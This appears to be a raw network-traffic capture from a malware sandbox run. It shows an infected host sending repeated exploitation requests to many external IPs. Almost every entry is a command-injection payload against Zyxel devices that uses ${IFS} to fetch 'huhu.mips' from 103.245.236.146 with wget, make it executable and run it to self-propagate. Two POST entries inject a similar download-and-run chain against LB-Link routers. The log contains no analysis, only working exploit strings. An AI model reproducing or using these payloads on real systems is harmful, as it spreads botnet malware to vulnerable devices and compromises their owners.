                                                Jan 29, 2024 07:08:06.712932110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9085192.168.2.2354188185.27.39.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.712999105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9086192.168.2.2356494170.79.79.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.713027954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9087192.168.2.2349354174.251.75.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.713061094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9088192.168.2.235354099.178.200.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.716586113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9089192.168.2.2334982141.95.108.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.716624975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9090192.168.2.2348984144.28.37.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.716664076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9091192.168.2.2353776113.128.131.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:06.716711044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9092192.168.2.234698484.238.243.1968080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.221216917 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                                Jan 29, 2024 07:08:07.450989962 CET882INHTTP/1.1 400 Bad Request
                                                Server: Mini web server 1.0 ZTE corp 2005.
                                                Accept-Ranges: bytes
                                                Connection: close
                                                Content-Type: text/html; charset=iso-8859-1
                                                Cache-Control: no-cache,no-store
                                                Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 52 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 7a 74 65 2e 63 6f 6d 2e 63 6e 22 3e 4d 69 6e 69 20 77 65 62 20 73 65 72 76 65 72 20 31 2e 30 20 5a 54 45 20 63 6f 72 70 20 32 30 30 35 2e 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 42 4f 44 59 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 48 54 4d 4c 3e 0a
                                                Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy. <HR> <ADDRESS><A HREF="http://www.zte.com.cn">Mini web server 1.0 ZTE corp 2005.</A></ADDRESS> </BODY> </HTML>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9093192.168.2.2341758118.148.49.1298080
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.273462057 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9094192.168.2.2353460193.247.137.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724415064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9095192.168.2.234120232.228.3.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724432945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9096192.168.2.2349390171.17.2.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724487066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9097192.168.2.235543453.228.153.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724519014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9098192.168.2.234781445.132.178.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724577904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9099192.168.2.234804254.220.16.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724605083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9100192.168.2.2344470172.220.133.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724652052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9101192.168.2.2347824223.223.200.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724695921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9102192.168.2.234571888.123.180.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724730015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9103192.168.2.235584270.94.145.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724770069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9104192.168.2.2339358164.243.19.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724822044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9105192.168.2.2354760168.107.210.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724875927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9106192.168.2.2344648146.130.182.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724909067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9107192.168.2.2360748129.194.74.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724946976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9108192.168.2.2334502221.19.104.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.724992037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9109192.168.2.2336026176.52.226.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725028038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9110192.168.2.233873454.98.184.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725075960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9111192.168.2.234378419.44.119.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725106955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9112192.168.2.2353424125.184.242.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725127935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9113192.168.2.2338686112.167.47.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725176096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9114192.168.2.2345264158.57.63.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725234032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9115192.168.2.2348772150.19.133.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725264072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9116192.168.2.2351892177.240.44.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725315094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9117192.168.2.233620417.93.255.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725343943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9118192.168.2.235652414.171.158.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725394964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9119192.168.2.2360162122.249.103.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725440979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9120192.168.2.2345208204.99.97.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725497961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9121192.168.2.2339080196.123.183.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725527048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9122192.168.2.23508945.122.47.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725554943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9123192.168.2.2342462137.169.205.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725598097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9124192.168.2.2354486171.190.204.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725656033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9125192.168.2.2360164181.193.69.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725682974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9126192.168.2.233292447.57.135.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725723982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9127192.168.2.2339260180.130.149.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725764036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9128192.168.2.2360656103.44.121.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725817919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9129192.168.2.2358166110.202.43.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725831032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9130192.168.2.2342682198.236.233.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725878954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9131192.168.2.2347906189.58.92.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725931883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9132192.168.2.2344550184.146.95.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.725958109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9133192.168.2.2350256144.201.36.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726021051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9134192.168.2.2342360132.211.182.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726054907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9135192.168.2.2344592188.91.64.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726077080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9136192.168.2.234907427.63.189.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:07.726119041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9137192.168.2.235968671.33.191.32443
